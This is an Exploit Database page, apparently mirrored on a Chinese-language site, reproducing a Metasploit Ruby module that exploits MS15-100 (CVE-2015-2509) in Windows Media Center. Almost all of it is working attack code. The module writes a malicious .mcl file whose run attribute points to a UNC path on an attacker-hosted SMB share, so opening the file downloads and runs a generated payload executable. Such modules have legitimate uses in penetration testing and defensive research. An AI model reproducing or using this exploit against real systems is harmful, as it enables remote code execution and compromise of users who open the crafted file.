Microsoft Windows Media Center – MCL (MS15-100) (Metasploit)

• Exploit Database
• 19 阅读

• 作者： Metasploit
  日期： 2015-09-15
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/38195/

• ##
  # This module requires Metasploit: http://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::SMB::Server::Share
  
  def initialize(info={})
  super(update_info(info,
  'Name' => "MS15-100 Microsoft Windows Media Center MCL Vulnerability",
  'Description'=> %q{
  This module exploits a vulnerability in Windows Media Center. By supplying
  an UNC path in the *.mcl file, a remote file will be automatically downloaded,
  which can result in arbitrary code execution.
  },
  'License'=> MSF_LICENSE,
  'Author' =>
  [
  'sinn3r',
  ],
  'References' =>
  [
  ['CVE', '2015-2509'],
  ['MSB', 'MS15-100']
  ],
  'Payload'=>
  {
  'DisableNops' => true
  },
  'DefaultOptions' =>
  {
  'DisablePayloadHandler' => 'false'
  },
  'Platform' => 'win',
  'Targets'=>
  [
  ['Windows', {}],
  ],
  'Privileged' => false,
  'DisclosureDate' => "Sep 8 2015",
  'DefaultTarget'=> 0))
  
  register_options(
  [
  OptString.new('FILENAME', [true, 'The MCL file', 'msf.mcl']),
  OptString.new('FILE_NAME', [ false, 'The name of the malicious payload to execute', 'msf.exe'])
  ], self.class)
  
  deregister_options('FILE_CONTENTS')
  end
  
  def generate_mcl
  %Q|<application run="#{unc}" />|
  end
  
  def primer
  self.file_contents = generate_payload_exe
  print_status("Malicious executable at #{unc}...")
  
  print_status("Creating '#{datastore['FILENAME']}' file ...")
  mcl = generate_mcl
  file_create(mcl)
  end
  
  end